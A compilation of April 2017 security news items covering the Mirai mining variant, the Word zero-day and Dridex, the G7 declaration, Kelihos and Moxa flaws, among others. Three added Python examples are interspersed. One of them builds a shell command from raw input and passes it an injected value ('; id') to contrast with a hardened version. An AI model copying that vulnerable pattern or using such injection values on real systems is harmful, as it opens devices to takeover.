The Mirai botnet was first spotted in August 2016 by the security researcher MalwareMustDie; it was specifically designed to compromise vulnerable or poorly protected IoT devices. Once the Mirai malware compromises an IoT device, it recruits it into a botnet primarily used for launching DDoS attacks, such as the one that hit the Dyn DNS service.
In October 2016, the Mirai source code was leaked and threat actors in the wild started customizing their Mirai botnet.
The latest variant of the Mirai botnet spotted in the wild by IBM researchers implements further capabilities: it includes a component for Bitcoin mining.
This is not surprising; crooks seize every opportunity, and the crypto-currency has doubled in value in recent months, reaching more than $1,290 per unit a few weeks ago.
“This new variant of ELF Linux/Mirai malware with the bitcoin mining component has us pondering, though.” reads the analysis published by IBM X-Force security researchers. “Attackers certainly have much to gain from having bitcoins in their pocket to facilitate their cybercriminal activities — bitcoin is the currency of choice for purchasing illegal commodities such as malware.”
The new Bitcoin mining-capable Mirai botnet was involved in a short-lived, high-volume campaign at the end of March.
The malware targeted Linux machines running BusyBox, most of them DVR servers with default Telnet credentials.
The new Mirai variant targets this specific category of IoT devices because it uses their computing power to mine Bitcoin.
“The new ELF Linux/Mirai malware variant we discovered included another add-on: a bitcoin miner slave. This led us to question the effectiveness of a bitcoin miner running on a simple IoT device that lacks the power to create many bitcoins, if any at all. Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium.” continues IBM. “We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode.”
The experts at IBM found the Mirai dropper in a web console and linked the site it was associated with to a series of high-volume command injection attacks.
The website was used by the operators as a malware package archive repository; experts discovered that the file package also included a Dofloo backdoor and a Linux shell.
Malware for Microsoft Word spread via e-mail attachment
12.4.2017 SecurityWorld Viry
Over the past several months, attackers have actively exploited a zero-day vulnerability in the popular office application Microsoft Word, using it to spread malware. According to the BBC, Microsoft fixed the flaw on Tuesday, April 11, in its standard monthly security update.
A Microsoft spokesperson recommended updating Word immediately after the patch is released; it is not certain whether the flaw also affects the version of Word for Apple Mac.
The first report of the attacks appeared only recently, from security firm McAfee, whose researchers analyzed several suspicious Word files. It emerged that the files exploit a vulnerability present "in all versions of Microsoft Office, including the latest Office 2016 on Windows 10".
The flaw is related to Windows OLE (object linking and embedding) technology, which allows objects and links to be inserted into a document and subsequently edited, McAfee researchers write in a blog post.
When the attackers' documents are opened by the user, they connect to an external server and download an HTA (HTML Application) file containing VBScript code, naturally laced with malware. The HTA file masquerades as an RTF and is executed automatically.
"A successful attack closes the infected Word document and pops up a decoy one that is shown to the user," the McAfee researchers describe. "In the background, the malware is already silently running, installed on the victim's system."
By searching through historical security data, McAfee found that the attacks have been going on since at least the end of January.
After McAfee's report, analysts from another security company, FireEye, confirmed that they had also been aware of these attacks for several weeks. They had reported everything to Microsoft and were cooperating with it on a fix.
According to FireEye, the infected Word documents are sent as e-mail attachments. The company did not provide any samples of the infected e-mails; given the zero-day status of the vulnerability, however, they were apparently aimed only at a limited number of users.
Both McAfee and FireEye noted that the vulnerability can bypass most of the memory-based protections included in Windows, because it is a logic flaw rather than a programming error.
G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE
12.4.2017 securityaffairs BigBrothers
The G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE presents voluntary, non-binding norms of State behavior during peacetime.
The risk of escalation and retaliation in cyberspace, together with the increasing number and sophistication of cyber attacks and cyber threats, could have a destabilizing effect on international peace and security. The risk of conflict between States caused by cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.
I’m very proud to share with you the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE; I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed at promoting stability and security in cyberspace. The declaration invites all States to collaborate with the intent of reducing risks to international peace, security, and stability.
Below are the points presented in the Declaration:
Consistent with the purposes of the United Nations, including to maintain international peace and security, States should cooperate in developing and applying measures to increase stability and security in the use of ICTs and to prevent ICT practices that are acknowledged to be harmful or that may pose threats to international peace and security;
In case of ICT incidents, States should consider all relevant information, including the larger context of the event, the challenges of attribution in the ICT environment and the nature and extent of the consequences;
States should not knowingly allow their territory to be used for internationally wrongful acts using ICTs;
States should consider how best to cooperate to exchange information, assist each other, prosecute terrorist, and criminal use of ICTs and implement other cooperative measures to address such threats. States may need to consider whether new measures need to be developed in this respect;
States, in ensuring the secure use of ICTs, should respect Human Rights Council resolutions 20/8 and 26/13 on the promotion, protection and enjoyment of human rights on the Internet, as well as General Assembly resolutions 68/167 and 69/166 on the right to privacy in the digital age, to guarantee full respect for human rights, including the right to freedom of expression;
A State should not conduct or knowingly support ICT activity contrary to its obligations under international law that intentionally damages critical infrastructure or otherwise impairs the use and operation of critical infrastructure to provide services to the public;
States should take appropriate measures to protect their critical infrastructure from ICT threats, taking into account General Assembly resolution 58/199 on the creation of a global culture of cybersecurity and the protection of critical information infrastructures, and other relevant resolutions;
States should respond to appropriate requests for assistance by another State whose critical infrastructure is subject to malicious ICT acts. States should also respond to appropriate requests to mitigate malicious ICT activity aimed at the critical infrastructure of another State emanating from their territory, taking into account due regard for sovereignty;
States should take reasonable steps to ensure the integrity of the supply chain so that end users can have confidence in the security of ICT products. States should seek to prevent the proliferation of malicious ICT tools and techniques and the use of harmful hidden functions;
States should encourage responsible reporting of ICT vulnerabilities and share associated information on available remedies to such vulnerabilities to limit and possibly eliminate potential threats to ICTs and ICT-dependent infrastructure;
States should not conduct or knowingly support activity to harm the information systems of the authorized emergency response teams (sometimes known as computer emergency response teams or cybersecurity incident response teams) of another State. A State should not use authorized emergency response teams to engage in malicious international activity.
No country should conduct or support ICT-enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or commercial sectors.
Let me thank my colleagues Luigi Martino and Marco Lapadura, who worked with me on the declaration, and of course Minister Gianfranco Incarnato, who led the working group.
Canada Court Denies Accused Yahoo Hacker Bail
12.4.2017 securityweek Crime
A Canadian court on Tuesday denied bail to a man accused of carrying out devastating cyberattacks on Yahoo as he awaits possible extradition to the United States to face criminal charges.
Karim Baratov, 22, an immigrant from Kazakhstan, was arrested on a US warrant in March for alleged hacking, commercial espionage and related crimes.
His lawyers said they will fight the extradition request. A hearing could begin as early as June and the process of deciding whether to extradite Baratov is expected to last up to three years.
US authorities alleged Russian intelligence agents hired Baratov and another hacker to carry out attacks on Yahoo from 2014 to 2016.
The data breach compromised 500 million Yahoo accounts and is one of the largest cyberattacks in history. Targets included Russian and US government officials, cyber security, diplomatic and military personnel, journalists, companies and financial firms.
Baratov's lawyers had asked that he be remanded into his parents' custody. His father vowed strict supervision at home, telling the court: "Jail would look like paradise."
But prosecutors said Baratov has ties to foreign spies and posed a flight risk, noting that one of his co-accused in the case fled to Russia.
Mandatory Certificate Authority Authorization Checks Will Boost Domain Security
12.4.2017 securityweek Safety
The issuance of SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates is expected to become a more secure process this September, after the implementation of mandatory Certificate Authority Authorization (CAA) checks.
After Certificate Authorities (CAs) and browser makers voted last month to make CAA checking mandatory, the new standard will be implemented starting September 8, 2017, according to Ballot 187 on the CA/Browser Forum site. Starting then, all CAs will have to check CAA records at issuance time for all certificates, which should prevent them from issuing certificates if not permitted to.
CAA is a DNS Resource Record that “allows a DNS domain name holder to specify one or more Certification Authorities (CAs) authorized to issue certificates for that domain and, by implication, that no other CAs are authorized.”
Domain owners will be able to set an issuance policy that all publicly-trusted CAs should comply with, thus preventing CAs from wrongfully issuing HTTPS certificates. This new standard should also mitigate the issue that “the public CA trust system is only as strong as its weakest CA,” Ballot 187 also reveals.
CAs will have to check “for a CAA record for each dNSName in the subjectAltName extension of the certificate to be issued.” This standard, however, doesn’t prevent CAs from checking CAA records at any other time.
Apparently, CAA checking isn’t required in specific scenarios, such as for “certificates for which a Certificate Transparency pre-certificate was created and logged in at least two public logs, and for which CAA was checked.”
If the CA or an Affiliate of the CA is the DNS Operator of the domain’s DNS, CAA checking becomes optional, the same as “for certificates issued by a Technically Constrained Subordinate CA Certificate as set out in Baseline Requirements section 7.1.5, where the lack of CAA checking is an explicit contractual provision in the contract with the Applicant.”
CAs are also required to document potential issuances that were prevented by CAA, and should also send reports of the requests to the contact(s) stipulated in the CAA iodef record(s), if present.
17 out of 19 voting CAs (94%) voted in favor of the new CAA standard. All three participating browser makers (Mozilla, Google, and Apple) voted in favor.
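As an added example (not from the article, the CA/Browser Forum or any CA's code), here is the per-dNSName decision a CA makes under the RFC 6844 CAA algorithm: climb from the requested name to the first label that has CAA records, then apply the issue/issuewild rules, refusing if a critical property tag is not understood. Live DNS is replaced by a constructed in-memory zone with hypothetical names, so it runs offline.

```python
"""CAA issuance check (RFC 6844 / RFC 8659 rules), added example.

Not the article's or any CA's code. The zone below is constructed
test data standing in for a DNS lookup of CAA records.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class CAARecord:
    flags: int  # bit 7 (value 128) = "issuer critical"
    tag: str    # "issue", "issuewild", "iodef", or something unknown
    value: str  # e.g. "ca-one.example.net; account=1234" or "mailto:..."

    @property
    def critical(self) -> bool:
        return bool(self.flags & 128)


# Constructed zone data (hypothetical domains and CA names).
ZONE: Dict[str, List[CAARecord]] = {
    "example.com": [
        CAARecord(0, "issue", "ca-one.example.net"),
        CAARecord(0, "iodef", "mailto:security@example.com"),
    ],
    "strict.example.com": [
        CAARecord(0, "issue", ";"),  # empty issuer: nobody may issue
    ],
    "wild.example.com": [
        CAARecord(0, "issue", "ca-one.example.net"),
        CAARecord(0, "issuewild", "ca-two.example.net"),
    ],
    "odd.example.com": [
        CAARecord(128, "futuretag", "x"),  # critical and not understood
    ],
}


def relevant_caa_set(name: str, zone: Dict[str, List[CAARecord]]
                     ) -> Tuple[Optional[str], List[CAARecord]]:
    """Walk from the name toward the root; the first label with CAA
    records is the relevant set. A wildcard name starts at its parent."""
    labels = name.rstrip(".").lstrip("*.").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        records = zone.get(candidate, [])
        if records:
            return candidate, records
    return None, []


def issuer_domain(value: str) -> str:
    """'ca.example.net; account=1' -> 'ca.example.net'; ';' -> ''."""
    return value.split(";", 1)[0].strip().lower()


def issuance_permitted(name: str, ca_domain: str,
                       zone: Dict[str, List[CAARecord]] = ZONE
                       ) -> Tuple[bool, str]:
    """Decide whether CA `ca_domain` may issue for dNSName `name`."""
    wildcard = name.startswith("*.")
    label, records = relevant_caa_set(name, zone)
    if not records:
        return True, "no CAA records in the tree; issuance not restricted"
    # A critical property the CA does not understand forbids issuance.
    for r in records:
        if r.critical and r.tag not in ("issue", "issuewild", "iodef"):
            return False, f"critical unknown tag '{r.tag}' at {label}"
    issue = [r for r in records if r.tag == "issue"]
    issuewild = [r for r in records if r.tag == "issuewild"]
    # For wildcard names, issuewild (when present) replaces issue.
    applicable = issuewild if (wildcard and issuewild) else issue
    if not applicable:
        return True, f"no applicable issue records at {label}"
    allowed = {issuer_domain(r.value) for r in applicable}
    if ca_domain.lower() in allowed:
        return True, f"{ca_domain} authorized by CAA at {label}"
    return False, f"{ca_domain} not in {sorted(allowed)} at {label}"


def iodef_contacts(name: str,
                   zone: Dict[str, List[CAARecord]] = ZONE) -> List[str]:
    """Contacts a CA should notify about a prevented issuance."""
    _, records = relevant_caa_set(name, zone)
    return [r.value for r in records if r.tag == "iodef"]


if __name__ == "__main__":
    for host, ca in [("www.example.com", "ca-one.example.net"),
                     ("www.example.com", "ca-two.example.net"),
                     ("*.wild.example.com", "ca-two.example.net"),
                     ("strict.example.com", "ca-one.example.net")]:
        ok, why = issuance_permitted(host, ca)
        print(f"{host:22} {ca:20} {'ISSUE' if ok else 'REFUSE'}: {why}")
        if not ok:
            print("   report to:", iodef_contacts(host))
```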
Dridex Attacks Exploit Recent Office 0-Day
11.4.2017 securityweek Exploit
A recently revealed zero-day vulnerability in Microsoft Office is being exploited by the Dridex banking Trojan to compromise unsuspecting victims’ computers, Proofpoint security researchers warn.
Detailed recently by McAfee and FireEye, the zero-day allows an attacker to achieve code execution on compromised machines. Leveraging Office’s Object Linking and Embedding (OLE) functionality, an attacker could create a malicious RTF (Rich Text Format) document that links to an HTA (HTML Application) file hosted on remote servers, which in turn executes a malicious Visual Basic script.
According to Proofpoint, the vulnerability is currently being exploited in malicious documents that millions of recipients across various organizations primarily in Australia have received via email, and which eventually led to the Dridex Trojan being installed on the compromised system.
The campaign features messages supposedly coming from “<[device]@[recipient's domain]>”, where [device] could be “copier”, “documents”, “noreply”, “no-reply”, or “scanner.” All emails use “Scan Data” as subject line, while the attached Microsoft Word RTF document is named “Scan_xxxx.doc” or “Scan_xxxx.pdf.”
“Note that while this campaign does not rely on sophisticated social engineering, the spoofed email domains and common practice of emailing digitized versions of documents make the lures fairly convincing,” Proofpoint says.
When the malicious document is opened, the exploit carries out a series of operations that eventually result in Dridex botnet ID 7500 being installed on the victim’s system. The security researchers noticed that the exploit worked without user interaction: the system was compromised even if the user was presented a dialog about the document containing “links that may refer to other files.”
The particular instance of Dridex distributed as part of this infection campaign was observed using over 100 injects for known banks and for various other popular applications and online destinations.
“Although document exploits are being used less frequently in the wild, with threat actors favoring social engineering, macros, and other elements that exploit "the human factor," this campaign is a good reminder that actors will shift tactics as necessary to capitalize on new opportunities to increase the effectiveness of their efforts,” Proofpoint says.
Hackers Targeting Amazon Third-Party Sellers With Password Reuse Attacks
11.4.2017 securityweek Hacking
Cyber criminals are re-using stolen passwords to access the accounts of third-party sellers on Amazon. They then change the bank account details and simply redirect customer payments to their own bank accounts. Where they find an old and disused account, they promote non-existent deals with heavy discounts, and again divert the proceeds to their own bank account. It should be noted that this is not an attack against Amazon users, but against Amazon third-party sellers.
It would be wrong to say that Amazon is being hacked. Legitimate passwords are being used to access legitimate accounts. These passwords come from the billions of stolen passwords available on the internet. Where there is a fault, it is in users' continued tendency to use the same password across multiple accounts; and to rarely, if ever, change them.
The only real difficulty for the criminals is matching the stolen and reused password to the Amazon account -- and this is not hard. Since almost all services employ the user's email address as the username, it is merely a question of locating a third-party seller, finding the seller's email address, and trying the associated password from the list of stolen passwords. "The attackers are mining the rich seam of stolen credentials publicly dumped or traded in underground forums," ESET senior research fellow David Harley told SecurityWeek. "That way, they only need to match known credentials to Amazon account holders."
Even if the seller's email address is not known, it could possibly be obtained from Amazon itself. "If Amazon is the weak spot, perhaps the registration page?" suggested Sean Sullivan, security advisor at F-Secure. "The 'Create account' page looks like something that could be targeted with a list of addresses, from which could easily be noted those to result in a message of 'email is already in use'. Then you have addresses to try on the sign-in page."
The basic password problem was highlighted in a recent study by Thycotic, which found that even security professionals reuse passwords, use weak passwords, and don't change them over long periods of time. A password stolen from Yahoo years ago might well provide access to other accounts today -- including Amazon.
The result, according to the Wall Street Journal, is that some sellers are losing thousands of dollars. "CJ Rosenbaum, a New York-based lawyer who represents Amazon sellers, says that more than a dozen of his clients have recently called to tell him they were hacked, a number of whom lost about half of their monthly sales of $15,000 to $100,000. They are asking Amazon for their money back, Mr. Rosenbaum said."
WSJ also reports that "some sellers say the hacks have shaken their confidence in Amazon's security measures." This isn't entirely fair -- all users should do more to protect their passwords: strong, unique passwords that are regularly changed. And wherever possible, two-factor options should be employed.
"It is critical for Amazon resellers to take advantage of Amazon's two-factor authentication to prevent this type of hijacking and phishing activity," comments Sophos' principal research scientist Chet Wisniewski. "All Amazon users should take advantage of this feature, but considering what third party resellers have at risk it is even more important. The easiest method to enable uses a time-oriented token you can load for free on your Android or iOS smartphone. The most popular app to use for this is Google's Authenticator app." Sophos has its own option that can be installed on Android or iOS and enabled in the Amazon or AWS account.
This is not to say that Amazon could not do more to protect its customers. In the desire to make things as easy as possible for customers, services like Amazon (and including almost all services from other ecommerce sites to social networks) do not enforce good password practices. Two-factor authentication is rarely required, and users are not forced to change passwords regularly. The bottom line, however, is that users need to better understand how to generate strong, unique passwords; and to regularly change them.
OWASP Proposes New Vulnerabilities for 2017 Top 10
11.4.2017 securityweek Vulnerebility
The Open Web Application Security Project (OWASP) announced on Monday the first release candidate for the 2017 OWASP Top 10, which proposes two new vulnerability categories.
The new categories proposed for OWASP Top 10 - 2017 are “insufficient attack detection and prevention” and “unprotected APIs.”
OWASP wants to make room for the “unprotected APIs” category by dropping “unvalidated redirects and forwards,” the 10th item on the current (2013) list, which was added to the top 10 in 2010.
The new insufficient attack protection category would be added to the 7th position. OWASP wants to make room for it by merging the current 4th and 7th items, namely insecure direct object references with missing function level access control. The organization has proposed the merger of the two old categories into “broken access control”, as it was back in 2004.
OWASP has provided the following description for the insufficient attack protection category: “The majority of applications and APIs lack the basic ability to detect, prevent, and respond to both manual and automated attacks. Attack protection goes far beyond basic input validation and involves automatically detecting, logging, responding, and even blocking exploit attempts. Application owners also need to be able to deploy patches quickly to protect against attacks.”
In a discussion on Reddit, several users said “insufficient attack protection” should not be classified as a flaw. It remains to be seen if enough users agree to make OWASP change its mind about creating a new category for it.
As for the unprotected APIs category, OWASP says, “Modern applications often involve rich client applications and APIs, such as JavaScript in the browser and mobile apps, that connect to an API of some kind (SOAP/XML, REST/JSON, RPC, GWT, etc.). These APIs are often unprotected and contain numerous vulnerabilities.”
Comments on the 2017 Top 10 proposal can be submitted via email until June 30 to OWASP-TopTen(at)lists.owasp.org, or dave.wichers(at)owasp.org (for private comments). The final version will be released in either July or August.
Mirai Variant Has Bitcoin Mining Capabilities
11.4.2017 securityweek IoT
A newly observed variant of the Mirai malware is abusing infected Internet of Things (IoT) devices for Bitcoin crypto-currency mining, IBM X-Force security researchers warn.
Initially spotted in September last year, Mirai was designed to find insecure IoT devices and ensnare them into a botnet primarily used for launching DDoS (distributed denial of service) attacks. Variants of the malware started to emerge after the Trojan’s source code was leaked, and a Windows variant designed to spread the Linux version was spotted earlier this year.
The newest variant moves beyond the initial DDoS capabilities of the botnet, with the addition of a component focused on Bitcoin mining. This crypto-currency has doubled in price over the past half year, trading at more than $1,290 per unit this March, above the November 2013 high of $1,242.
The Bitcoin mining-capable Mirai variant was observed in a short-lived, high-volume campaign at the end of March, targeting Linux machines running BusyBox. The attack focuses on devices such as DVR servers, which usually feature BusyBox with default Telnet credentials that Mirai targets with a dictionary attack brute-force tool.
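Mirai's propagation leaves a recognisable network footprint: a single infected device opening connections to many distinct hosts on Telnet ports 23 and 2323 in a short time. The following is an added example (not code from IBM X-Force or the article) of a detector for that pattern over constructed connection records in a hypothetical "<unix_ts> <src_ip> <dst_ip> <dst_port>" format; it tracks a sliding window per source so a slow or single-destination Telnet user is not flagged.

```python
"""Flag sources that fan out to many distinct Telnet targets inside a short window.

Added example, not code from IBM X-Force or the article. The record format
"<unix_ts> <src_ip> <dst_ip> <dst_port>" and all addresses are constructed.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Tuple

TELNET_PORTS = {23, 2323}  # Mirai's default Telnet targets


def parse_record(line: str) -> Tuple[int, str, str, int]:
    ts, src, dst, dport = line.split()
    return int(ts), src, dst, int(dport)


def detect_telnet_scanners(lines: Iterable[str], threshold: int = 10,
                           window_s: int = 60) -> Dict[str, int]:
    """Return {src_ip: peak number of distinct Telnet destinations seen within any
    window_s-second window} for sources that reach `threshold` distinct destinations.
    Records must be in time order."""
    recent: Dict[str, Deque[Tuple[int, str]]] = defaultdict(deque)
    peak: Dict[str, int] = {}
    for line in lines:
        ts, src, dst, dport = parse_record(line)
        if dport not in TELNET_PORTS:
            continue  # only Telnet connections count towards the scan score
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window_s:
            q.popleft()  # drop connections that fell out of the sliding window
        distinct = len({d for _, d in q})
        if distinct >= threshold and distinct > peak.get(src, 0):
            peak[src] = distinct
    return peak


def sample_records() -> List[str]:
    """Constructed traffic: one Mirai-style scanner, one admin, one web client, one slow prober."""
    rows: List[str] = []
    for i in range(15):  # scanner: 15 targets on 23/2323 within 15 seconds
        port = 23 if i % 2 == 0 else 2323
        rows.append(f"{1000 + i} 10.0.0.5 192.168.0.{i + 1} {port}")
    for i in range(12):  # admin: repeated Telnet sessions to a single DVR
        rows.append(f"{1000 + i} 10.0.0.9 192.168.0.200 23")
    for i in range(15):  # web client: many hosts, but on port 80
        rows.append(f"{1000 + i} 10.0.0.7 192.168.1.{i + 1} 80")
    for i in range(15):  # slow prober: 15 Telnet targets, 100 s apart
        rows.append(f"{2000 + 100 * i} 10.0.0.8 192.168.2.{i + 1} 23")
    return rows


if __name__ == "__main__":
    for src, count in detect_telnet_scanners(sample_records()).items():
        print(f"possible Telnet scanner {src}: {count} distinct targets within 60 s")
```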
In addition to the various types of attacks that Mirai bots can perform, such as TCP, UDP, and HTTP floods, the new variant also turns the compromised devices into Bitcoin miner slaves. Because IoT devices usually lack computing power, they can’t create Bitcoins, at least not on their own.
“Given Mirai’s power to infect thousands of machines at a time, however, there is a possibility that the bitcoin miners could work together in tandem as one large miner consortium. We haven’t yet determined that capability, but we found it to be an interesting yet concerning possibility. It’s possible that while the Mirai bots are idle and awaiting further instructions, they could be leveraged to go into mining mode,” IBM explains.
IBM researchers found the Mirai dropper in a web console and associated the site to a series of high-volume command injection attacks. They also determined that the website was used as a malware package archive repository and that it was also counting infected victims in real-time. What’s more, the file package also included a Dofloo backdoor and a Linux shell.
Mirai is only one of the malware families to have adopted crypto-currency mining lately, after the Sundown exploit kit started distributing a Monero miner several months ago. Last year, researchers discovered a Go-based Linux Trojan focused on Monero mining.
Cisco Finds Many Flaws in Moxa Industrial APs
11.4.2017 securityweek Vulnerebility
Cisco’s Talos intelligence and research group has conducted a two-week analysis of an industrial wireless access point (AP) from Taiwan-based Moxa and discovered more than a dozen vulnerabilities, including ones that can be exploited to take full control of a device.
A blog post published by Talos on Monday describes the vulnerabilities found by researchers during their tests. All of the flaws have been addressed by Moxa, except for one critical weakness, whose details will not be disclosed until a patch becomes available.
Experts focused on Moxa’s AWK-3131A AP, which is recommended for any type of industrial wireless application.
On the first day of testing, researchers identified the services available on the BusyBox-powered device, including SSH (Dropbear), Telnet, HTTP and HTTPS. Talos said Moxa agreed to share the source code of its BusyBox implementation for proper analysis.
Researchers first identified some authentication issues that made it easy for attackers to launch dictionary attacks against the web interface’s login page, and flaws that allowed hackers to hijack user sessions.
On the third day of the investigation, researchers discovered many cross-site scripting (XSS) vulnerabilities in the front-end of the web interface. These flaws can be exploited to hijack user sessions and gain access to the web interface.
Once they are authenticated, attackers can exploit one of the several command injection vulnerabilities in order to gain full control of the targeted AP.
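Command injection in an embedded web interface almost always comes from a diagnostic handler that splices a user-supplied value into a shell string. The following is an added example (not Moxa firmware or Talos code) with a hypothetical "ping" diagnostic shown in its vulnerable form beside a hardened one that validates the target against an allow-list and passes it as a separate argv element with no shell.

```python
"""A diagnostic handler's command injection, vulnerable beside hardened.

Added example, not Moxa's firmware or Talos's code; the "ping" diagnostic and all
target values are hypothetical/constructed.
"""
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 host name: dot-separated labels of letters, digits and inner hyphens, <= 253 chars
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def vulnerable_ping_command(target: str) -> str:
    """The injection pattern: the request parameter is concatenated into a shell command
    line (in a CGI this string would go to system()/popen()). Returned, not executed,
    so the effect of a crafted value stays visible."""
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Allow-list validation: an IPv4/IPv6 literal or a syntactically valid host name.
    Anything else (spaces, ;, |, $( ), backticks, leading '-') is rejected outright."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target")


def hardened_ping_argv(target: str) -> List[str]:
    """argv form: the target is one argument, never parsed by a shell."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str) -> int:
    """Execute the hardened form with shell=False and a timeout; returns the exit status."""
    completed = subprocess.run(hardened_ping_argv(target), shell=False,
                               timeout=10, capture_output=True)
    return completed.returncode


if __name__ == "__main__":
    crafted = "192.0.2.10; id"  # constructed value a request parameter might carry
    print("vulnerable builds:", vulnerable_ping_command(crafted))
    try:
        hardened_ping_argv(crafted)
    except ValueError as exc:
        print("hardened rejects:", exc)
    print("hardened argv:", hardened_ping_argv("192.0.2.10"))
```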
Several of the security holes found by Talos can allow malicious actors to obtain potentially valuable information without any authentication, including passwords, firewall rules and network configuration data.
Experts have also uncovered a denial-of-service (DoS) vulnerability that can be exploited remotely to crash the web application.
On the last day of testing, researchers identified several cryptography-related issues. Specifically, they determined that the Moxa AP used an outdated version of OpenSSL (1.0.0d from 2011), which left it vulnerable to attacks such as POODLE and DROWN.
“Our research demonstrates how many vulnerabilities can be quickly discovered by analyzing a device,” Talos researchers said. “There is nothing to suggest that this device is more or less vulnerable than any other. Indeed, the vulnerabilities we discovered are exactly the types of vulnerabilities likely to be discovered on any ICS device.”
U.S. Takes Down Kelihos Botnet After Its Russian Operator Arrested in Spain
11.4.2017 thehackernews BotNet
A Russian computer hacker arrested over the weekend in Barcelona was apparently detained for his role in a massive computer botnet, and not for last year's US presidential election hack as reported by the Russian media.
Peter Yuryevich Levashov, a 32-year-old Russian computer programmer, is suspected of operating the Kelihos botnet — a global network of over 100,000 infected computers that has been used to deliver spam, steal login passwords, and infect computers with ransomware and other types of malware since approximately 2010 — the U.S. Justice Department announced Monday.
As suspected earlier, Levashov, also known as Peter Severa, is the same man who has also been listed in the World's Top 10 Worst Spammers maintained by anti-spam group Spamhaus, which has given him the 7th position in the list.
The arrest was made possible after the FBI learned just last month that Levashov was traveling with his family to Spain from his home in Russia, a country without any extradition treaty with the United States.
Initially, it was believed that Levashov was detained on suspicion of the 2016 US election hack, after his wife told Russian publication RT that authorities said her husband’s apprehension was in part due to his involvement in the U.S. election hacking, including the notorious breach of the Democratic National Committee (DNC).
However, the DoJ press release indicates no link at all between Levashov and the US election hack.
Instead, Levashov was linked to the Kelihos botnet by the FBI because he used the same IP address to operate the botnet that he used to access his email and other online accounts in his name, including Apple iCloud and Google Gmail accounts.
According to the indictment unsealed Monday, Levashov operated the botnet since 2010, targeting Microsoft Windows machines for infection. He allegedly used Kelihos to distribute hundreds of millions of spam emails per year, and pump-and-dump stock scams.
Besides conducting spamming operations, prosecutors also alleged that Levashov used the Kelihos botnet to infect end-user computers with malware and harvest passwords to online and bank accounts belonging to thousands of Americans.
"The ability of botnets like Kelihos to be weaponized quickly for vast and varied types of harms is a dangerous and deep threat to all Americans, driving at the core of how we communicate, network, earn a living, and live our everyday lives," said Acting Assistant Attorney General Blanco.
"Our success in disrupting the Kelihos botnet was the result of strong cooperation between private industry experts and law enforcement, and the use of innovative legal and technical tactics."
The FBI officials obtained court orders (Rule 41 of the Federal Rules of Criminal Procedure) to redirect Kelihos-infected PCs to servers operated by authorities — a process known as "Sinkhole attack" — and to block any attempts by the botnet to regain control of those sinkholed computers.
The FBI said it worked with security firm CrowdStrike and Shadowserver Foundation, a volunteer group of information security experts, to deploy the sinkhole attack to disconnect communications between criminals and infected computers.
Levashov has been charged with wire fraud and unauthorized interception of electronic communications. The government is now seeking his extradition to the United States.
Unpatched Microsoft Word Flaw is Being Used to Spread Dridex Banking Trojan
11.4.2017 thehackernews Vulnerebility
If you are a regular reader of The Hacker News, you might be aware of an ongoing cyber attack — detected in the wild by McAfee and FireEye — that silently installs malware on fully-patched computers by exploiting an unpatched Microsoft Word vulnerability in all current versions of Microsoft Office.
Now, according to security firm Proofpoint, the operators of the Dridex malware started exploiting the unpatched Microsoft Word vulnerability to spread a version of their infamous Dridex banking trojan.
Dridex is currently one of the most dangerous banking trojans on the Internet that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating PCs and stealing victim's online banking credentials and financial data.
The Dridex actors usually relied on macro-laden Word files to distribute the malware through spam messages or emails.
However, this is the first time when researchers found the Dridex operators using an unpatched zero-day flaw in Microsoft Word for distributing their banking trojan.
According to a blog post published Monday night by Proofpoint, the latest Dridex spam campaign is delivering Word documents weaponized with this zero-day to millions of recipients across several organizations, including banks primarily located in Australia.
"Emails in this campaign used an attached Microsoft Word RTF (Rich Text Format) document. Messages purported to be from "[device]@[recipient's domain]." [Device] may be "copier", "documents", "noreply", "no-reply", or "scanner"," Proofpoint researchers say.
"The subject line in all cases read "Scan Data" and included attachments named "Scan_123456.doc" or "Scan_123456.pdf", where "123456" was replaced with random digits...the spoofed email domains and the common practice of emailing digitized versions of documents make the lures fairly convincing."
As we reported on Saturday, this zero-day flaw is severe because it gives hackers power to bypass most exploit mitigations developed by Microsoft, and unlike past Word exploits seen in the wild, it doesn't require victims to enable Macros.
Moreover, given the danger of the Dridex banking trojan – also known as Bugat and Cridex – people are strongly advised not to open Word documents attached to an email from anyone, even a known sender, until Microsoft releases a patch.
Microsoft knew of the flaw very long ago
According to researchers at McAfee and FireEye, Microsoft has known of the remote code flaw since January and could release a patch for the vulnerability today, as part of its regular Patch Tuesday routine.
However, independent security researcher Ryan Hanson claimed that he discovered this 0-day, along with two other flaws, in July and reported them to Microsoft in October 2016.
"The initial discovery was in July, which was followed up by additional research and the identification of a protected view bypass vulnerability. Those two bugs and an additional Outlook bug were submitted to MS in October," Hanson told The Hacker News.
"There may very well be additional HTA related vectors in Office, but based on the detail provided by McAfee, the vulnerability they've identified functions exactly like the one I disclosed. The only difference I see is the VBScript payload, since my payload simply executed calc.exe."
If Hanson's claims are true and the vulnerability he reported is the same one being used in the wild to spread Dridex, Microsoft left its customers vulnerable to attacks even after having known of the critical flaw for quite some time.
Enable 'Protected View' in Microsoft Office to Prevent Attack
